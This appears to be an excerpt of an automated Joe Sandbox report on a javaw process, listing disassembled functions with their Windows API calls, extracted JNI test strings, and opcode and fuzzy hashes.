                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2844380259.00000000028D2000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_28d2000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: c4d6ede4df22ed28e6a61ad64b43f83331f48f438addc4d0d6ec43f91a244377
                                                                                                                                                                                                                                    • Instruction ID: 9ce4e75b9550efaff36bf7f84a272f9d3bfd691912597f95217d6bbf07f7d2e7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c4d6ede4df22ed28e6a61ad64b43f83331f48f438addc4d0d6ec43f91a244377
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DBF09BBAA04B06EBDB25CF65C0047CAFBB4BB88714F54421AC82C67360D778B469CBC0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 028DDA35 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 343 28dda35-28dda4f 344 28dda5a-28dda8e 343->344
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2844380259.00000000028D2000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_28d2000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: dac0adea2164b57c8f98350b3893088a6493ae25fd927d35c7e5b1f82a723661
                                                                                                                                                                                                                                    • Instruction ID: 0514eeac2f882e8144a06f308a670891b6ced1f5c50dcd9716ea586a76ff2583
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dac0adea2164b57c8f98350b3893088a6493ae25fd927d35c7e5b1f82a723661
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5CF0C2BAD00A06ABDB248F61C4047DAFBB4BB44714F14461AC52C67320D378B465CBC0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 028E49AA Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2844380259.00000000028D2000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_28d2000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 3212301fbd1168627394636bf04e2b83f60ec090e87d484d826d803c2137708b
                                                                                                                                                                                                                                    • Instruction ID: 02be0bfb1e0edba82ff556477aff5ac6bad686b5f35d8a28ed98c4eb955c2059
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3212301fbd1168627394636bf04e2b83f60ec090e87d484d826d803c2137708b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 07F0CABAD00A06ABDB248FA1C1047CAFBB4BB88714F14421AC42CA7320D378B469CBC0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 028DDE6E Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2844380259.00000000028D2000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_28d2000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: b21991b550f69292e1797f0c3ea01ff8d36b2cab92e345ad66c058859c314c17
                                                                                                                                                                                                                                    • Instruction ID: d30022a559b61266d59c7d6168b1a6e81228c5dec2af6b1e40f8f66746cc3008
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b21991b550f69292e1797f0c3ea01ff8d36b2cab92e345ad66c058859c314c17
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5FF0CABAD00A06ABDB248F61C0047CAFBB4BB88714F14821AC42CA7320C778B469CBD0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 028DB407 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 341 28db407-28db421 342 28db42c-28db460 341->342
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2844380259.00000000028D2000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_28d2000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 95132434b22da91c44bbfba5c853d2d17ddce52e9f221a166011d795ad46bb54
                                                                                                                                                                                                                                    • Instruction ID: d1cd31d9ee4e7ca339561fafc302fb9cf246d12be67a23d54c8e1e20ee2e383e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 95132434b22da91c44bbfba5c853d2d17ddce52e9f221a166011d795ad46bb54
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9CF0C2BAD00A06ABDB248F61C0047CAFBB4BB84714F15421AC42C67360D778B465CBC0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 028E3C76 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2844380259.00000000028D2000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_28d2000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: afaff73caae5e9dcd08b1b8a8883f79c0bc40e5facc9ab49b5048c509180e4b2
                                                                                                                                                                                                                                    • Instruction ID: 6e57ddfe296dda9c084663e650e8c21fd4346f6fc47db8788726572ba6a54ead
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: afaff73caae5e9dcd08b1b8a8883f79c0bc40e5facc9ab49b5048c509180e4b2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80F0C2BAD00A06ABDB248F61C0047CAFBB4BB44714F14461AC42C67320D378B465CBC0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 028E45E9 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2844380259.00000000028D2000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_28d2000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: c456b815d39efec36ad594203489c3fd33b2d6f85c8ead2d735003ee7e67c5d4
                                                                                                                                                                                                                                    • Instruction ID: 0b9ee0c5c76e840b1d2463884bd5e1de8841105afc498b194122f06e169c9ab0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c456b815d39efec36ad594203489c3fd33b2d6f85c8ead2d735003ee7e67c5d4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C6F0C2BAD00A06ABDB248FA1C0047CAFBB4BB44714F14461AC52C67320D378B465CBC0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                    Function 73A91110 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 56windowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetWinEventHook.USER32(00000003,00000003,00000000,73A91020,00000000,00000000,00000000), ref: 73A91139
                                                                                                                                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 73A9115E
                                                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 73A91176
                                                                                                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 73A9117C
                                                                                                                                                                                                                                    • _wprintf.LIBCMT ref: 73A91183
                                                                                                                                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 73A9119E
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2857387985.0000000073A91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857357104.0000000073A90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857437082.0000000073A98000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857465680.0000000073A9B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857493977.0000000073A9E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_73a90000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Message$DispatchEventHookTranslate_wprintf
                                                                                                                                                                                                                                    • String ID: asdasdasdasdasdsdasd
                                                                                                                                                                                                                                    • API String ID: 1774198118-1471917671
                                                                                                                                                                                                                                    • Opcode ID: 17efc2c31e21b5e9a803fb1cb030f3d7c7c7e26ffecf0970f9e894e6e76d9c39
                                                                                                                                                                                                                                    • Instruction ID: 3b877cb01f9c98ef82471c602d65dc139c0b868d82845f6bf378841290be183c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 17efc2c31e21b5e9a803fb1cb030f3d7c7c7e26ffecf0970f9e894e6e76d9c39
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 01111A72A407057FF710EB5DCC43F5977ADE744710F304019E609B65D4DAB465058BA9
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 73A91244 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 73A91716
                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 73A9172B
                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(73A98180), ref: 73A91736
                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 73A91752
                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 73A91759
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2857387985.0000000073A91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857357104.0000000073A90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857437082.0000000073A98000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857465680.0000000073A9B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857493977.0000000073A9E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_73a90000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2579439406-0
                                                                                                                                                                                                                                    • Opcode ID: 2e3cfa19c75b096de8783faae9d07bddee0bf0c5976ac6a4a777cc744cb89dbc
                                                                                                                                                                                                                                    • Instruction ID: 23708c796cee942b13807c69309bc79010a31bf7d70c2d782b8706f92b75bb93
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e3cfa19c75b096de8783faae9d07bddee0bf0c5976ac6a4a777cc744cb89dbc
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 75218CB69113089FD709EF16D5467447BF9FB48744F25001AE60DB6241EFB159828B09
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02983518 Relevance: .3, Instructions: 337COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2844380259.0000000002974000.00000040.00000800.00020000.00000000.sdmp, Offset: 02974000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_2974000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 715dec2b849759096b5f81b640c0172a7f82e8c55de31488a9d2b09cc70a359a
                                                                                                                                                                                                                                    • Instruction ID: 4ddef37873fbb89e6251d2b4b4468282c7dbd17c95eecfe83e176a519824b7eb
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 715dec2b849759096b5f81b640c0172a7f82e8c55de31488a9d2b09cc70a359a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 07C13A72A047118FC314CF69C48011AFBF2BBC8764F5A8A6EE998A7351D771EC52CB85
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 029C6D50 Relevance: .3, Instructions: 319COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2844380259.0000000002974000.00000040.00000800.00020000.00000000.sdmp, Offset: 02974000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_2974000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 25dd7560c954bcdeede259b1814f51821700dae2fa35fa0bdf6a8df04eea98bf
                                                                                                                                                                                                                                    • Instruction ID: 8b8e2ba5c40a777df574a4667b5d49d398da34cec3c33fec2f1bb73f47af976c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 25dd7560c954bcdeede259b1814f51821700dae2fa35fa0bdf6a8df04eea98bf
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D0A15B77E029224793288A098C44119A6536FDC215BBFC7B9DD2C6F79FC9B0EC1297D8
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 73A911B0 Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2857387985.0000000073A91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857357104.0000000073A90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857437082.0000000073A98000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857465680.0000000073A9B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857493977.0000000073A9E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_73a90000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 95002326716624d81ec65998c004629a22a2ddac3b2b7d058063a58cb41ac565
                                                                                                                                                                                                                                    • Instruction ID: 43f2e91032d5ea347b947844c4aa38fe74811e3e65ec3e51cd946d36012d974c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 95002326716624d81ec65998c004629a22a2ddac3b2b7d058063a58cb41ac565
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 73A93386 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,73A91407,73A99B20,00000008,73A9159B,?,?,?,73A99B40,0000000C,73A91656,?), ref: 73A9338E
                                                                                                                                                                                                                                    • __mtterm.LIBCMT ref: 73A9339A
                                                                                                                                                                                                                                      • Part of subcall function 73A93065: DecodePointer.KERNEL32(0000000A,73A914CA,73A914B0,73A99B20,00000008,73A9159B,?,?,?,73A99B40,0000000C,73A91656,?), ref: 73A93076
                                                                                                                                                                                                                                      • Part of subcall function 73A93065: TlsFree.KERNEL32(00000022,73A914CA,73A914B0,73A99B20,00000008,73A9159B,?,?,?,73A99B40,0000000C,73A91656,?), ref: 73A93090
                                                                                                                                                                                                                                      • Part of subcall function 73A93065: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,73A914CA,73A914B0,73A99B20,00000008,73A9159B,?,?,?,73A99B40,0000000C,73A91656,?), ref: 73A93F06
                                                                                                                                                                                                                                      • Part of subcall function 73A93065: _free.LIBCMT ref: 73A93F09
                                                                                                                                                                                                                                      • Part of subcall function 73A93065: DeleteCriticalSection.KERNEL32(00000022,?,?,73A914CA,73A914B0,73A99B20,00000008,73A9159B,?,?,?,73A99B40,0000000C,73A91656,?), ref: 73A93F30
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 73A933B0
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 73A933BD
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 73A933CA
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 73A933D7
                                                                                                                                                                                                                                    • TlsAlloc.KERNEL32(?,?,73A91407,73A99B20,00000008,73A9159B,?,?,?,73A99B40,0000000C,73A91656,?), ref: 73A93427
                                                                                                                                                                                                                                    • TlsSetValue.KERNEL32(00000000,?,?,73A91407,73A99B20,00000008,73A9159B,?,?,?,73A99B40,0000000C,73A91656,?), ref: 73A93442
                                                                                                                                                                                                                                    • __init_pointers.LIBCMT ref: 73A9344C
                                                                                                                                                                                                                                    • EncodePointer.KERNEL32(?,?,73A91407,73A99B20,00000008,73A9159B,?,?,?,73A99B40,0000000C,73A91656,?), ref: 73A9345D
                                                                                                                                                                                                                                    • EncodePointer.KERNEL32(?,?,73A91407,73A99B20,00000008,73A9159B,?,?,?,73A99B40,0000000C,73A91656,?), ref: 73A9346A
                                                                                                                                                                                                                                    • EncodePointer.KERNEL32(?,?,73A91407,73A99B20,00000008,73A9159B,?,?,?,73A99B40,0000000C,73A91656,?), ref: 73A93477
                                                                                                                                                                                                                                    • EncodePointer.KERNEL32(?,?,73A91407,73A99B20,00000008,73A9159B,?,?,?,73A99B40,0000000C,73A91656,?), ref: 73A93484
                                                                                                                                                                                                                                    • DecodePointer.KERNEL32(Function_000031E9,?,?,73A91407,73A99B20,00000008,73A9159B,?,?,?,73A99B40,0000000C,73A91656,?), ref: 73A934A5
                                                                                                                                                                                                                                    • __calloc_crt.LIBCMT ref: 73A934BA
                                                                                                                                                                                                                                    • DecodePointer.KERNEL32(00000000,?,?,73A91407,73A99B20,00000008,73A9159B,?,?,?,73A99B40,0000000C,73A91656,?), ref: 73A934D4
                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 73A934E6
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2857387985.0000000073A91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857357104.0000000073A90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857437082.0000000073A98000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857465680.0000000073A9B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857493977.0000000073A9E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_73a90000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                                                                                                                                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                                                                                    • API String ID: 3698121176-3819984048
                                                                                                                                                                                                                                    • Opcode ID: 88bef1543b8d85015b2b1b24bdb5b7c11f5e568ddf32cd1d1d1b397ae46ac6e6
                                                                                                                                                                                                                                    • Instruction ID: ca19dd587a6dec392ec9faf1c4f770da8440d46b3c24e45d5e7086126918fb33
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 88bef1543b8d85015b2b1b24bdb5b7c11f5e568ddf32cd1d1d1b397ae46ac6e6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 75315CB2D00724DBE7017B768D4B7093FF8EB9A261725062BE499B62D4DF3680438F54
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 73A91020 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 78COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • IsWindow.USER32(?), ref: 73A9103A
                                                                                                                                                                                                                                    • GetWindowTextLengthA.USER32(?), ref: 73A91066
                                                                                                                                                                                                                                    • _malloc.LIBCMT ref: 73A91073
                                                                                                                                                                                                                                      • Part of subcall function 73A9128D: __FF_MSGBANNER.LIBCMT ref: 73A912A6
                                                                                                                                                                                                                                      • Part of subcall function 73A9128D: __NMSG_WRITE.LIBCMT ref: 73A912AD
                                                                                                                                                                                                                                      • Part of subcall function 73A9128D: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,73A93512,?,00000001,?,?,73A93FA4,00000018,73A99BD0,0000000C,73A94034), ref: 73A912D2
                                                                                                                                                                                                                                    • GetWindowTextA.USER32(?,00000000,-00000002), ref: 73A91083
                                                                                                                                                                                                                                    • _free.LIBCMT ref: 73A910B4
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2857387985.0000000073A91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857357104.0000000073A90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857437082.0000000073A98000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857465680.0000000073A9B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857493977.0000000073A9E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_73a90000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Window$Text$AllocHeapLength_free_malloc
                                                                                                                                                                                                                                    • String ID: (Ljava/lang/String;)V$This string comes from JNI$changeString$com/Title
                                                                                                                                                                                                                                    • API String ID: 2407992236-2500405646
                                                                                                                                                                                                                                    • Opcode ID: 5b67dd134a63a8ff8b90ea1993242187319a72afc41ca3ce7062d62df8e8e81f
                                                                                                                                                                                                                                    • Instruction ID: a602176387bf7f5ac59044d64dee61da12fa337e09cb6c034be7cf277af4f7aa
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b67dd134a63a8ff8b90ea1993242187319a72afc41ca3ce7062d62df8e8e81f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B821C576600641AFE300EB6ECC86F5777EDFB892147254169E84DF7715DA31E802CBA4
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 73A92BA4 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 205COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000006.00000002.2857387985.0000000073A91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857357104.0000000073A90000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857437082.0000000073A98000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857465680.0000000073A9B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000006.00000002.2857493977.0000000073A9E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_73a90000_javaw.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                                    • String ID: @$g
                                                                                                                                                                                                                                    • API String ID: 269201875-2917482895
                                                                                                                                                                                                                                    • Opcode ID: 6e3ac355f6e2c7c2b1c25858ab100b6c93854050422eb7d726143d9f1d6a8756
                                                                                                                                                                                                                                    • Instruction ID: 969aa92d8b61d590bf7c0d33ab10458dc3e276b1f4088470f51a8e7355b98881
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e3ac355f6e2c7c2b1c25858ab100b6c93854050422eb7d726143d9f1d6a8756
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C28159B184522D8AFB219F14CCCA7A8BBF9EB19304F2501DBD40AB61A9C7754BC5CF58
